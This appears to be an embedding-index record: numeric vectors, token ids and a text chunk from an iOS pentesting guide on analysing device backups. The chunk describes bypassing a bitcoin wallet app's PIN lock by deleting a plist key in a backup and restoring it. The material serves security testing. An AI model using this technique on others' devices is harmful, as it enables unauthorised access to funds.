-0.2479933500289917, -0.3198850452899933, -0.6785941123962402, 0.2933519780635834, 0.7344186305999756, -0.5912961959838867, -0.6290022134780884, 0.6656723618507385, 0.030896857380867004, 0.8278210163116455, -0.5674295425415039, -0.1715811938047409, 0.432690292596817, 0.05812076851725578, 0.9571022987365723, -0.3159930408000946, -0.3102223575115204, -0.18423448503017426, -0.6972226500511169, -0.6508074998855591, 0.39238831400871277, 0.4521101117134094, 0.28943994641304016, 0.8543313145637512, -0.23394089937210083, 0.1296371966600418, 0.10772944241762161, -1.3255677223205566, 0.5320519804954529, 0.20242759585380554, 0.4282571077346802, -0.44508060812950134, 0.5566091537475586, 0.05372726172208786, 0.45719945430755615, -0.7689980864524841, -0.24574506282806396, -0.6178662776947021, -0.5529716610908508, -0.2466786652803421, 0.27784591913223267, -0.17873896658420563, 0.1252729594707489, -0.4535270035266876, 0.39348724484443665, 1.2161048650741577, 0.38112735748291016, -0.10727126151323318, 0.12075001746416092, -0.04392218962311745, 0.13492748141288757, 0.13515619933605194, 0.28302302956581116, 0.9492183327674866, 0.47626811265945435, 0.14191199839115143, 0.2703075408935547, -0.5751471519470215, -0.6235646605491638, 0.3082810342311859, -0.2815433740615845, -0.5332046151161194, 1.0277323722839355, -0.06190682202577591, 0.33893927931785583, 0.11052563041448593, -0.5340518951416016, -0.9987344145774841, -0.3248575031757355, -0.07276687771081924, -1.4144591093063354, -0.2589556872844696, -0.04673949256539345, 0.04373256117105484, 0.21888811886310577, -0.25441139936447144, 0.14064228534698486, 0.9155389666557312, 0.4188649654388428, 0.6635820269584656, 0.3503168225288391, 1.1268419027328491, -0.4466826021671295, -1.3863670825958252, -0.08633679151535034, -0.20817993581295013, -0.4210340678691864, -0.03190108388662338, -0.3196221888065338, -0.1285739690065384, -0.3697139024734497, -0.7160449624061584, 0.20186194777488708, 0.9363676309585571, 0.1980735957622528, -0.2862163484096527, 0.31587255001068115, -0.2303929626941681, 0.1326504647731781, -0.541985034942627, 0.12452732771635056, -0.06305770576000214, 0.9288349747657776, 0.33753031492233276, 0.866643488407135, 0.607322633266449, 0.12876556813716888, 0.10720568895339966, 0.021264882758259773, -0.24912306666374207, 0.23625695705413818, 0.051784079521894455, 0.9228032827377319, 0.5107521414756775, 0.08337380737066269, 0.7121452689170837, 0.0989747866988182, 0.24721454083919525, 0.2007429003715515, 0.1823992282152176, 1.0137637853622437, -0.6312030553817749, 0.1815212070941925, 0.6957947611808777, 0.3903503715991974, -0.7566860914230347, -0.13377967476844788, 0.5260046124458313, 1.0932931900024414, -0.7927550673484802, -0.8671799898147583, -0.13143162429332733, 0.1443643420934677, 0.09167178720235825, 0.03516089916229248, 0.44013965129852295, 0.5491029024124146, 0.36015063524246216, 0.18048064410686493, -0.15374839305877686, -0.8318106532096863, -0.7434418797492981, -0.3489745259284973, -0.7958415150642395, -0.5727589130401611, -0.7980204224586487, 0.26275888085365295, 0.8311006426811218, -1.0126971006393433, 0.5468711256980896, -0.8433762192726135, 0.045701682567596436, 0.1971285194158554, 0.28506413102149963, -0.19121390581130981, -0.47858619689941406, 0.014909048564732075, -1.4488297700881958, 0.279815137386322, -0.07391832023859024, 0.927599310874939, -0.45209169387817383, 0.05325722321867943, -0.3082062005996704, 0.0021467716433107853, -0.13743935525417328, -0.5663167238235474, 0.873856782913208, 0.24402877688407898, -0.3218882977962494, 0.06435234844684601, 0.9341680407524109, 0.16810937225818634, 0.056557729840278625, 0.11726900935173035, -0.30425119400024414, 0.9036811590194702, -0.4042891561985016, -0.16620685160160065, -0.06719079613685608, 0.2634105682373047, -0.7727994322776794, 0.17066006362438202, -0.1143776997923851, 0.6976029276847839, -0.7401938438415527, 0.27523812651634216, 0.5444090366363525, -0.11797779053449631, 0.30375930666923523, -0.33141639828681946, 0.17179261147975922, -0.4070023000240326, 0.07656853646039963, -0.31421855092048645, 0.1478140652179718, 0.27172794938087463, -0.045723848044872284, -1.0499922037124634, 0.20436157286167145, -0.24437832832336426, -0.7765511870384216, -0.09233968704938889, 0.10834486037492752, 0.41190463304519653, 0.1081758439540863, 0.45454296469688416, -0.16921798884868622, -0.0018139398889616132, 0.050349026918411255, 0.1460244357585907, -0.42588964104652405, -0.5618812441825867, -0.4062342643737793, -0.3178299069404602, -0.3740934729576111, 0.45612141489982605, 0.5960842967033386, -0.416113018989563, -0.609700083732605, -0.246476948261261, -0.4248545169830322, -0.4863184988498688, 0.36137521266937256, 0.03848319500684738, 0.6040719747543335, 0.7210482954978943, -0.35482317209243774, -0.14868558943271637, 0.3838745653629303, -0.32925063371658325, 0.6498128771781921, -0.009165617637336254, -0.18382404744625092, 0.32263895869255066, -0.1086522787809372, -1.0044656991958618, 0.15312525629997253, 0.39774495363235474, 0.35109010338783264, 0.04426880180835724, 0.731772243976593, -0.48869991302490234, -0.23312310874462128, 0.3149496614933014, -0.6491847634315491, -0.5614902377128601, 0.5524932146072388, 0.5041146874427795, 0.7209248542785645, -0.5551591515541077, 0.16141319274902344, -0.26576101779937744, -0.18984436988830566, 0.22835315763950348, 0.45074111223220825, -0.3218521773815155, -0.3885080814361572, -0.5105098485946655, -0.421637624502182, -0.3001527488231659, 0.567715048789978, 0.32736173272132874, 0.30888840556144714, -0.42158016562461853, -0.6920628547668457, -0.9377891421318054, 0.1612025499343872, 0.8704890608787537, 0.9937098622322083, 0.22851687669754028, 0.7613927721977234, 0.5399065017700195, -0.8025016784667969, -0.3316688537597656, -0.8645314574241638, 0.14743635058403015, -0.24389058351516724, 0.9310267567634583, 0.038646746426820755, 0.04253634065389633, -0.31900182366371155, -0.1352999359369278, -0.5081878304481506, 0.13269682228565216, -0.0914757251739502, -0.14293056726455688, -1.0249050855636597, -0.6163202524185181, -0.4969777762889862, -0.01791590452194214, -0.37137559056282043, -0.14872927963733673, -0.7407297492027283, 0.20345117151737213, 1.230692744255066, -0.6227051019668579, -0.047287192195653915, -0.17026787996292114, -0.06699730455875397, 0.1997639387845993, 0.1300823986530304, -0.6677316427230835, -1.0627681016921997, -0.2749546468257904, -0.09909621626138687, 0.38234809041023254, 0.6765548586845398, 0.539741575717926, 0.3751028776168823, -0.8328928351402283, 0.06160386651754379, 0.9493740200996399, -0.7722925543785095, -0.2221812605857849, 0.05105829983949661, 0.2592191696166992, 0.22653016448020935, 0.29678958654403687, 0.4104110300540924, 0.27028319239616394, 0.5409014225006104, -0.3843300938606262, 0.46800675988197327, -0.768592357635498, -0.3507347106933594, 0.19147643446922302, 0.11096765846014023, -0.16522951424121857, 0.26176968216896057, -0.3828461468219757, 0.49505841732025146, 0.0003765496367122978, 0.08944075554609299, -0.2611905038356781, -0.4600377380847931, 1.1989550590515137, 0.18122242391109467, -0.40446990728378296, 0.3998168110847473, 0.09768130630254745, -0.021479779854416847, -0.025903966277837753, -0.7100375294685364, -0.62871253490448, 0.4854311943054199, -0.32055026292800903, 0.607032835483551, -0.11560302972793579, -0.1696123629808426, -0.40850478410720825, -0.19129379093647003, 0.684404194355011, -0.21798664331436157, 0.2223695069551468, -1.1522868871688843, -0.3562188446521759, -0.6702494025230408, -0.10066844522953033, 0.17336493730545044, 0.6599616408348083, 0.1394648402929306, 0.13280950486660004, -0.4064391851425171, 0.2198719084262848, -0.8465351462364197, -0.47397199273109436, -0.43125730752944946, -0.12092654407024384, -0.2451254427433014, -0.5852380990982056, 0.5961573719978333, 0.2769034504890442, -0.4325305223464966, 0.8233758211135864, 0.025356680154800415, 0.32540756464004517, -0.5229108333587646, 0.011593538336455822, -0.33084946870803833, 0.2981731593608856, 0.23573412001132965, 0.5706634521484375, 0.060545891523361206, -0.028699401766061783, 0.5921376943588257, 0.6223675012588501, 0.21970248222351074, 0.007947735488414764, -0.6603325009346008, 0.2792131304740906, 0.9941553473472595, -0.3192572593688965, -0.14967088401317596, 0.1759713888168335, 0.2759705185890198, -0.1770818829536438, -1.078695297241211, -0.015349154360592365, -0.5814104676246643, -0.9116650223731995, 0.058087270706892014, -0.6047481894493103, 0.6727977395057678, -0.21391265094280243, -0.4764399528503418, -0.4523729085922241, 0.5352990031242371, 0.6301308274269104, -0.6526824831962585, 0.3665982484817505, -0.0592535063624382, 0.612528383731842, -0.7701577544212341, 0.21377673745155334, -0.5704841613769531, -0.39700108766555786, -0.6532983779907227, 0.8408184051513672, -1.1309528350830078, -0.07009799778461456, 0.3241003453731537, -0.313725084066391, 0.5986940264701843, 0.18549710512161255, -0.5617652535438538, -0.2338215708732605, 0.10658169537782669, -0.15494351089000702, -0.7025442719459534, 0.5280787944793701, -0.47507235407829285, 0.2273607701063156, 0.07164879888296127, -0.356059193611145, 0.604543149471283, -0.12831321358680725, -0.7304290533065796, 0.1794338971376419, 0.44496044516563416, -1.2556370496749878, 0.3147319555282593, -0.29308775067329407, 0.7323427796363831, 0.19982127845287323, 0.25053614377975464, -0.991481602191925, 0.4780142307281494, -0.8089819550514221, -1.1627081632614136, 0.07177983969449997, -0.39483222365379333, -0.143511563539505, 0.34958627820014954, -0.2450772523880005, 0.176083505153656, -0.2664749026298523, -0.06717287003993988, 1.0674781799316406, 0.14377063512802124, 0.3249739408493042, -0.7548354864120483, 0.7005946636199951, 0.37388378381729126, -0.3102501928806305, 0.1964622288942337, -0.03869536146521568, -0.2026916891336441, -0.5544848442077637, -0.3978036344051361, -0.4655631482601166, -0.801048755645752, -0.46935245394706726, 0.5190730690956116, 0.19313770532608032, 0.6195777654647827, -0.03870292752981186, -0.3195413053035736, -0.036378756165504456, 0.7291987538337708, -0.39614337682724, 0.16550108790397644, 0.43750444054603577, 0.2582458257675171, 0.03658043220639229, -0.43960922956466675, -0.34444889426231384, -0.06291033327579498, -0.07209274917840958, 0.8575474619865417, 0.5282492637634277, -0.5031217336654663, 0.8139769434928894, 0.2523469030857086, -1.0220454931259155, -0.5899434685707092, -0.2785724103450775, 0.21205919981002808, 0.33999699354171753, -0.22010213136672974, 0.05504853278398514, 0.4944304823875427, -0.3425354063510895, 0.14375321567058563, 0.21208302676677704, 0.04189152643084526, 0.06724944710731506, -0.21792463958263397, 0.07671709358692169, -0.17156028747558594, -0.3558200001716614, 0.6048183441162109, -0.7509657740592957, -0.7732665538787842, -0.5082300305366516, 0.2229285091161728, -0.4626726508140564, -0.0302252359688282, 0.9213510751724243, -0.3109402060508728, -0.043465107679367065, 0.2663153409957886, -0.020059937611222267, 0.605610191822052, 0.019302956759929657, 0.5387569069862366, 0.8491114377975464, 0.5471664071083069, 0.021587109193205833, -0.1368131935596466, 0.4586762487888336, 0.003845951985567808, -0.21163539588451385, -0.3633938133716583, 0.21009568870067596, -0.23774397373199463, 0.6926590800285339, -0.08805257827043533, -0.2962421476840973, -0.5362672209739685, -0.5264374613761902, 0.10658897459506989, 0.18716509640216827, -0.8060831427574158, -0.5249335169792175, -0.13002867996692657, -0.06388569623231888, -0.379005491733551, -0.41025426983833313, 0.7400957345962524, -0.7684327960014343, 0.770090639591217, -1.1795945167541504, 0.18197591602802277, -0.7650289535522461, -0.43702173233032227, -0.5878060460090637, -0.05229891836643219, -0.9477320313453674, -0.5948689579963684, -0.6317386031150818, -0.18853740394115448, -1.1058132648468018, 0.20615358650684357, -0.34924331307411194, -0.22467927634716034, -0.47028160095214844, -0.13504281640052795, 0.5674230456352234, 0.8397020697593689, -0.36617985367774963, 0.45147156715393066, 0.17527858912944794, 0.13103817403316498, 0.47061774134635925, -0.4855124354362488, 0.4664883315563202, -0.04009729623794556, 0.3345451056957245, 0.29688191413879395, 0.32104310393333435, -0.34392261505126953, 0.39652881026268005, 0.726920485496521, -0.5949649810791016, -0.17852449417114258, -0.5547167062759399, 0.26498833298683167, 0.565784215927124, 0.043345894664525986, -0.24870644509792328, 0.4680050015449524, 0.3327387571334839, -0.3401983976364136, -0.6236554980278015, 0.2520514726638794, 0.3102371096611023, 0.06399133801460266, 0.08025400340557098, -0.32004645466804504, -0.03678828105330467, -0.21639668941497803, -0.3242787718772888, -0.15777216851711273, -0.17043399810791016, 0.05223289504647255, -0.09751982986927032, 0.12417660653591156, -0.2707473337650299, -0.4584757685661316, 0.8056114912033081, 0.04576243460178375, 0.5908759236335754, 0.6204112768173218, -0.10168997943401337, 0.4857860803604126, -0.5641788840293884, -0.25591298937797546, -0.5743828415870667, -0.4949644207954407, 0.454087495803833, 0.27211442589759827, -0.2664634883403778, -0.2871650457382202, 0.10532137006521225, 0.9020593762397766, 0.30061185359954834, -0.041097525507211685, 0.12637895345687866, -0.21309076249599457, -0.25567910075187683, 0.25778111815452576, -0.4092762768268585, 0.02789583057165146, -0.46686577796936035, 0.2903363108634949, -0.7184596657752991, -0.47567299008369446, 0.6373136043548584, 0.5225881934165955, -0.3218856155872345, -0.30130213499069214, -0.024811411276459694, -0.04281790181994438, 0.8621415495872498, 0.22114020586013794, 0.8058417439460754, -0.08694957196712494, -0.5640788674354553, 0.7165118455886841, -0.4473322033882141, 0.5802900195121765, -0.1330040544271469, 0.2016008049249649, -0.04731236770749092, -0.5107499361038208, -0.05207319185137749, -0.1869421899318695, 0.4977003335952759, 0.5397321581840515, 0.31509923934936523, 0.2749464809894562, 0.46278584003448486, -0.44662025570869446, -0.27727457880973816, -0.5629221796989441, 0.4460725784301758, 0.25748345255851746, 0.012728715315461159, -0.6243540048599243, 0.6166829466819763, 0.5462042093276978, -0.49967673420906067, -0.5159273147583008, 0.839479923248291, 0.07658855617046356, -0.4361726641654968, 0.15338337421417236, -0.11070806533098221, -0.5768795013427734, 0.416506290435791, -0.4987117350101471, 0.22654473781585693, 0.2217509001493454, 0.09411922842264175, -0.3581317961215973, 0.1996098905801773, 0.7062782645225525, -0.8811947107315063, 0.624112069606781, 0.10325384140014648, 0.03745560348033905, 0.24032074213027954, -0.24221919476985931, -0.9186866283416748, 0.49837687611579895, 0.8065623641014099, -0.09838984906673431, 0.19344554841518402, 0.3517667353153229, 0.321279376745224, 0.052796799689531326, 0.2983609735965729, -0.376473069190979, -1.5331753492355347, -0.042735956609249115, 0.07076272368431091, -0.5728681683540344, -1.162843942642212, -0.23772576451301575, 0.3495196998119354, -0.9878787398338318, 0.46821561455726624, -0.3620411157608032, 0.5535848140716553, -0.5351089239120483, -0.10160540044307709, -0.5064905881881714, 0.5835790038108826, 0.2934626340866089, -0.131736159324646, -0.7810776233673096, 0.7976431250572205, -0.021596435457468033, -0.3278735876083374, 0.07812229543924332, 0.34206998348236084, 0.5684345960617065, 0.2884717583656311, -0.11129305511713028, -0.4580559730529785, -0.26109522581100464, 0.4034510552883148, 0.18786025047302246, -0.7270891070365906, -0.07753997296094894, -0.9369586706161499, 0.41750988364219666, 0.11793931573629379, -0.7606550455093384, -0.39109086990356445, 0.23241353034973145, -0.11387649178504944, -1.0396217107772827, 0.28907129168510437, -0.10326361656188965, -0.18323493003845215, 0.42415136098861694, -0.40552231669425964, 0.04595309868454933, 0.5827049016952515, -0.5531670451164246, 0.07185591012239456, -0.39843007922172546, 0.1336865872144699, -0.25787150859832764, 0.5541653633117676, -0.5238807201385498, -0.044497691094875336, 0.12879011034965515, -0.5805773735046387, -0.426952987909317, 0.3691129684448242, -0.34023988246917725, -0.06553290784358978, 1.1606379747390747, -0.5372885465621948, 0.9486013054847717, 0.6400455236434937, -0.06401156634092331, -0.22553415596485138, 0.3363577127456665, 0.4434667229652405, -0.4562048017978668, 0.2237814962863922, 0.44532740116119385, -0.22812922298908234, 0.23935432732105255, 0.30073869228363037, 1.0571218729019165, -0.16459433734416962, -0.5071430802345276, -0.03903653845191002, -0.10321535170078278, -1.0362297296524048, -0.3813975155353546, 0.08929935842752457, 0.3554147183895111, -0.2107357382774353, 0.33538907766342163, -0.01601499319076538, 0.20542016625404358, -1.1173874139785767, 0.62044757604599, 0.14743784070014954, 0.054821308702230453, 0.4318530857563019, 0.053880225867033005, 0.2950012683868408, -1.3294498920440674, 4.2621612548828125, 1.2341159582138062, 0.310442179441452, 0.10944971442222595, 0.3285716772079468, 1.0478929281234741, 1.2187552452087402, -0.7708306312561035, -0.194535493850708, -0.5515998005867004, 0.3980810344219208, -0.7199890613555908, 0.22848637402057648, -0.14221510291099548, 0.8978431224822998, 0.49014827609062195, -0.08921314775943756, 0.2956090271472931, 0.7249407768249512, -0.9801366329193115, -1.3282471895217896, 0.07179968804121017, -0.4556307792663574, 1.3616286516189575, 0.25845345854759216, 0.14315131306648254, 0.7699220180511475, -0.7505804300308228, -0.23872502148151398, 0.22805717587471008, -0.13999444246292114, -0.7612265944480896, 0.5089713931083679, -0.26774823665618896, -0.3730841875076294, 0.4087124168872833, 0.08820772916078568, -0.8314732909202576, -0.543036699295044, 0.09586325287818909, 0.09017223119735718, -0.23051723837852478, 0.40505343675613403, -0.6867393255233765, -0.3968465328216553, 0.9327144622802734, -0.20041337609291077, 1.391828179359436, 0.6406409740447998, -0.7339863181114197, 0.404999703168869, -0.05390392988920212, 0.7287930846214294, -0.6428973078727722, -0.6013497710227966, -0.04975898191332817, 0.08809220790863037, -0.1677512377500534, 0.2556365430355072, -0.22085104882717133, 0.3261377811431885, -0.2708759307861328, -0.14493611454963684, 0.11199907213449478, -1.1231259107589722, 0.26374706625938416, -0.4883892834186554, 1.1285282373428345, -0.06363000720739365, -0.12119074910879135, -0.5333892107009888, -0.157612606883049, -0.6130874156951904, -0.6844375133514404, 0.936142086982727, -0.2184659242630005, -0.1529647558927536, 0.337503045797348, 0.2533826231956482, -0.9311542510986328, -0.10126298666000366, -0.188009575009346, -0.565173864364624, -0.37920448184013367, 0.7294090390205383, 0.7695883512496948, -0.009595620445907116, -0.6516799330711365, 0.6410430669784546, 0.28584784269332886, 0.42972511053085327, 0.5111990571022034, -0.4881373643875122, 0.07010898739099503, 0.295681893825531 ]
[ 12022, 1021, 2410, 1024, 4413, 1024, 2403, 18059, 28549, 1031, 5989, 2692, 2581, 1033, 1026, 5060, 1028, 1024, 5796, 1024, 5060, 1024, 1999, 20614, 2075, 1024, 1006, 19701, 1007, 1031, 28549, 1033, 1006, 14168, 2575, 1012, 4002, 1007, 12022, 1021, 2410, 1024, 4413, 1024, 2403, 18059, 3543, 1031, 5989, 2692, 2620, 1033, 1026, 5060, 1028, 1024, 5796, 1024, 5060, 1024, 1999, 20614, 2075, 1024, 1006, 19701, 1007, 1031, 3543, 1033, 1006, 14168, 2575, 1012, 4002, 1007, 1012, 1012, 1012, 2224, 7577, 4355, 2000, 4089, 3857, 1998, 8285, 8585, 2147, 12314, 2015, 6113, 2011, 1996, 2088, 1005, 1055, 2087, 3935, 2451, 5906, 1012, 10200, 20763, 2015, 2950, 8285, 1011, 10200, 2838, 2008, 3443, 4809, 1997, 1996, 2951, 8250, 2006, 1996, 5080, 1012, 2017, 2064, 2191, 16380, 10200, 2015, 2013, 2115, 3677, 3274, 2011, 2478, 11943, 1006, 6229, 6097, 2891, 22326, 1007, 2030, 2424, 2121, 1006, 2013, 6097, 2891, 22326, 9921, 1007, 1010, 2030, 3081, 1996, 24582, 23743, 2094, 10200, 3444, 1012, 1999, 2119, 3572, 1010, 1996, 10200, 2950, 3053, 2035, 2951, 8250, 2006, 1996, 16380, 5080, 3272, 3811, 7591, 2951, 2107, 2004, 6207, 3477, 2592, 1998, 3543, 8909, 10906, 1012, 2144, 16380, 10457, 2039, 5361, 18726, 1998, 2037, 2951, 1010, 2019, 5793, 5142, 2003, 3251, 7591, 5310, 2951, 8250, 2011, 1996, 10439, 2453, 4895, 18447, 4765, 19301, 2135, 17271, 2083, 1996, 10200, 1012, 2178, 5142, 1010, 2295, 2625, 5793, 1010, 2003, 3251, 7591, 9563, 10906, 2109, 2000, 4047, 2951, 2030, 21573, 10439, 15380, 2071, 2022, 17214, 4842, 2098, 2000, 2689, 10439, 9164, 2044, 16487, 1037, 6310, 10200, 1012, 2119, 5936, 2024, 9398, 1998, 2122, 24728, 19666, 6906, 14680, 2031, 10003, 2000, 4839, 1999, 1037, 6565, 2193, 1997, 18726, 2651, 1012, 1037, 10200, 1997, 1037, 5080, 2006, 2029, 1037, 4684, 4646, 2038, 2042, 5361, 2097, 2421, 2035, 4942, 4305, 2890, 16761, 3111, 1006, 3272, 2005, 3075, 1013, 17053, 2015, 1013, 1007, 1998, 6764, 1999, 1996, 10439, 1005, 1055, 2797, 14176, 1012, 3568, 1010, 4468, 23977, 7591, 2951, 1999, 5810, 18209, 2306, 2151, 1997, 1996, 6764, 2030, 19622, 2015, 2008, 2024, 1999, 1996, 10439, 1005, 1055, 2797, 14176, 2030, 4942, 4305, 2890, 16761, 3111, 1012, 2348, 2035, 1996, 6764, 1999, 5491, 1013, 1998, 3075, 1013, 4646, 2490, 1013, 2024, 2467, 6153, 2039, 2011, 12398, 1010, 2017, 2064, 23329, 6764, 2013, 1996, 10200, 2011, 4214, 24978, 3126, 2140, 2275, 6072, 8162, 3401, 10175, 5657, 1024, 9292, 3240, 1024, 7561, 1024, 2007, 1996, 24978, 3126, 6856, 10288, 20464, 13936, 19699, 24991, 3600, 6279, 14839, 3145, 1012, 2017, 2064, 2224, 1996, 24978, 3126, 6856, 10288, 20464, 13936, 19699, 24991, 3600, 6279, 14839, 1998, 12935, 3126, 6856, 10288, 20464, 13936, 19699, 24991, 3600, 6279, 14839, 5371, 2291, 5144, 2000, 23329, 6764, 1998, 2472, 3111, 2013, 10200, 2015, 1012, 3568, 2043, 9361, 1996, 10200, 1997, 2019, 4646, 2017, 2323, 4638, 2065, 2151, 7591, 2592, 2003, 7801, 1998, 2065, 2017, 2064, 19933, 2151, 7591, 9164, 1997, 1996, 4646, 2011, 29226, 2070, 4292, 1997, 1996, 10200, 1998, 16487, 1996, 10200, 14406, 2000, 5852, 7559, 2102, 2011, 4526, 1037, 10200, 1997, 1996, 5080, 1006, 2017, 2064, 2079, 2009, 2478, 2424, 2121, 1007, 1998 ]
hack_tricks
43.txt
16
finding where is the backup stored. the official apple documentation will help you to locate backups of your iphone, ipad, and ipod touch. once you have found the backup of the device ( / users / carlos. martin / library / application support / mobilesync / backup / { deviceid } ) you can start looking for sensitive information using grep for example, or using tools like imazing ). to identify if a backup is encrypted, you can check the key named " isencrypted " from the file " manifest. plist ", located at the root of the backup directory. the following example shows a configuration indicating that the backup is encrypted : <? xml version = " 1. 0 " encoding = " utf - 8 "? > <! doctype plist public " - / / apple / / dtd plist 1. 0 / / en " " http : / / www. apple. com / dtds / propertylist - 1. 0. dtd " > < plist version = " 1. 0 " >... < key > date < / key > < date > 2021 - 03 - 12t17 : 43 : 33z < / date > < key > isencrypted < / key > < true / >... < / plist > in case you need to work with an encrypted backup, there are some python scripts in dinosec's github repo, such as backup _ tool. py and backup _ passwd. py, that will serve as a good starting point. however, note that they might not work with the latest itunes / finder versions and might need to be tweaked. you can also use the tool iosbackup to easily read and extract files from a password - encrypted ios backup. how to modify the behaviourin the open source bitcoin wallet app, bither, you'll see that it's possible to configure a pin to lock the ui. this is pin is stored in the file net. bither. plist inside the pin _ code key. if you clear this key from that plist in the backup and restores the backup, you will be able to access the wallet. testing memory for sensitive dataat some point sensitive information is going to be stored in memory. the objective is to make sure that this info is exposed as briefly as possible. to investigate an application
[ 0.8827866315841675, -0.8557376265525818, -0.02413993701338768, 0.5474923849105835, 0.2531431317329407, 0.13001924753189087, -0.3874065577983856, 0.9369499087333679, 0.06650877743959427, 0.6455102562904358, 0.760409951210022, -0.1017235517501831, 0.2602844536304474, -0.14963094890117645, -0.6052243709564209, -0.035435885190963745, -0.0521194227039814, 0.4976266026496887, 0.011920477263629436, -0.1423560082912445, 0.8881720900535583, -0.24031879007816315, -0.7384483218193054, -0.5611373782157898, -0.32369303703308105, 0.48843643069267273, 0.9278163909912109, 0.23885945975780487, 0.33998575806617737, 0.7021700739860535, -0.2023458629846573, 0.019092649221420288, 0.36659905314445496, -0.26992207765579224, -0.1552911251783371, 0.18050628900527954, 0.8435932993888855, 0.26729175448417664, -0.4945448040962219, -1.7349176406860352, -0.41684645414352417, -0.1077461838722229, 0.4589322805404663, -0.5140641331672668, -1.152079463005066, -0.47867080569267273, -0.6278033256530762, 0.13880617916584015, -0.09660416096448898, -0.384400874376297, 0.1992238163948059, 0.03699778765439987, 0.23583941161632538, 0.36758461594581604, 0.4871920347213745, 0.6024941802024841, 0.6526740789413452, 0.6004993319511414, 0.01291936356574297, 0.6595190763473511, 0.22556377947330475, -0.22916166484355927, 0.014026879332959652, -0.6102982759475708, -0.13294905424118042, 0.07850335538387299, -0.2916174530982971, -0.31122058629989624, -0.13242405652999878, -0.6119627952575684, 0.33001628518104553, 0.6249847412109375, -0.3786070942878723, -0.4140538275241852, -0.051933370530605316, 0.286662757396698, 0.32815220952033997, 0.033949896693229675, 0.20587158203125, 0.5311803817749023, -0.2464185208082199, 0.7099843621253967, 0.7283312082290649, 0.10112475603818893, -0.4903630316257477, -0.7576128244400024, 0.2246500700712204, -0.10517235845327377, -0.6991161108016968, -0.32399120926856995, 0.6095874905586243, 0.6475351452827454, -0.8069118857383728, -0.2987942695617676, 0.022053135558962822, 0.5858867168426514, -0.06938201934099197, -0.48685401678085327, -0.019343893975019455, -0.36864590644836426, 0.4842647910118103, -0.03564067557454109, 0.3527013957500458, 0.6110984086990356, -0.5399559736251831, 0.42436540126800537, 0.49638038873672485, -0.4758734405040741, 0.07527580857276917, -0.1404007524251938, 0.2404072880744934, -0.7049410939216614, 0.5095846652984619, -1.0140964984893799, -0.3132094144821167, 0.04388602450489998, 0.6986732482910156, -0.6332176923751831, -0.08633836358785629, 0.10618428140878677, 0.3065554201602936, -0.32766976952552795, 0.5131281614303589, -0.16871166229248047, 0.297615110874176, 0.3965233564376831, 0.16137753427028656, 0.5693626999855042, -0.9338569641113281, -0.18675118684768677, -0.40325427055358887, -0.17281047999858856, 0.22049881517887115, 0.658490777015686, -0.5822749137878418, -0.23525571823120117, 0.3606090843677521, -0.051613833755254745, -0.012948781251907349, -0.7186728715896606, 0.10395815968513489, 0.09738866984844208, 0.36170223355293274, 0.697807788848877, -0.13031494617462158, -0.14230038225650787, 0.030159763991832733, -0.5805281400680542, -0.20672117173671722, 0.6274228692054749, 0.1291021853685379, 0.783650815486908, 0.3555895984172821, -0.25519663095474243, 0.004495440516620874, 0.1671963781118393, -0.8234102725982666, 0.6815117001533508, 0.1335604041814804, 0.2533775269985199, -0.5856310725212097, 0.9036307334899902, -0.07610636204481125, 0.6074494123458862, -0.8016103506088257, -0.08523135632276535, -0.24528920650482178, -0.6799319386482239, 0.2661000192165375, 0.2859416902065277, -0.4592420160770416, -0.48832106590270996, -0.1428898423910141, 0.49205338954925537, 1.2823340892791748, 0.7463502883911133, 0.13492479920387268, -0.11979806423187256, -0.03255595266819, 0.40652114152908325, -0.431909441947937, 0.125966876745224, 0.1665792465209961, 0.8276414275169373, -0.3732585310935974, 0.2276875525712967, -0.13625885546207428, -0.4419752359390259, -0.7998283505439758, -0.5476534366607666, -0.8707850575447083, 1.2335954904556274, -0.25746646523475647, 0.22637173533439636, 0.02729327604174614, -0.38318294286727905, -1.1935395002365112, -0.8958684802055359, 0.12809327244758606, -1.3659839630126953, -0.21697081625461578, -0.299578458070755, 0.011571696028113365, 0.23860576748847961, -0.3951861262321472, 0.06883516907691956, 0.9236012697219849, 0.051836274564266205, 0.0604497529566288, 0.48969265818595886, 1.2144386768341064, -0.10453029721975327, -0.786505937576294, -0.2343437224626541, -0.21648170053958893, -0.3655916154384613, 0.17996746301651, 0.32087066769599915, 0.1433960497379303, -0.30744025111198425, -0.417729914188385, 0.8410217761993408, 0.7308109998703003, 0.06599055975675583, -0.31101953983306885, -0.3695374131202698, 0.7118935585021973, 0.37913891673088074, -0.947577714920044, 0.043451834470033646, 0.3352433741092682, 0.7135752439498901, 0.5387137532234192, 0.7719345688819885, 0.3569612205028534, 0.3324538469314575, 0.06560666114091873, -0.03402138128876686, -0.14828233420848846, -0.519366443157196, 0.35116031765937805, 0.6487939357757568, 0.6236361265182495, 0.2945520579814911, 0.5547240972518921, -0.6104329824447632, -0.017869308590888977, 0.28321531414985657, 0.5176798701286316, 0.7969184517860413, -1.1042081117630005, 0.44897687435150146, 0.649199903011322, 0.1685410439968109, -0.6259732842445374, -0.037377163767814636, 0.29062962532043457, 0.9635540246963501, -0.9146976470947266, -0.968101441860199, -0.36631911993026733, 0.05626438558101654, -0.16506421566009521, 0.25244566798210144, 0.697341799736023, 0.6504573225975037, 0.06638830900192261, 0.4822213351726532, 0.08384538441896439, -1.017126441001892, -0.6582891941070557, -0.8010910153388977, -1.0884349346160889, -0.2971673607826233, -0.5077357888221741, 0.6995917558670044, -0.01785530522465706, -0.712737500667572, -0.26998499035835266, -0.7332440614700317, -0.14502307772636414, 0.3908320963382721, 0.5459570288658142, 0.11224386096000671, -0.2287505567073822, -0.3448497951030731, -1.0163944959640503, 0.47790589928627014, 0.04437890648841858, 0.699494481086731, -0.020702015608549118, -0.10334045439958572, 0.06615561246871948, -0.18600232899188995, 0.2405632883310318, -0.5727158188819885, 0.6789708733558655, 0.22225020825862885, -0.5438723564147949, 0.03290630504488945, 0.366741418838501, 0.5253769755363464, -0.262931764125824, -0.05197673290967941, -0.5394968390464783, 1.0805917978286743, 0.24740543961524963, -0.5063698291778564, 0.01603284478187561, 0.513718843460083, -0.43937915563583374, 0.7562512755393982, 0.1712043136358261, 0.9116010069847107, -0.211210235953331, 0.4583633244037628, 0.5992540717124939, -0.021826209500432014, 0.3916076719760895, 0.316832959651947, -0.09546155482530594, -0.6441646218299866, 0.37025782465934753, -0.31111061573028564, 0.15678411722183228, -0.006609441712498665, -0.08934076130390167, -1.095811128616333, 0.4723789691925049, -0.2653799057006836, -0.53709477186203, 0.2201007902622223, 0.12427987158298492, 0.9495040774345398, -0.29537633061408997, -0.03814730420708656, -0.27828219532966614, -0.6935105919837952, 0.6055681705474854, 0.9160488843917847, -0.5905947089195251, 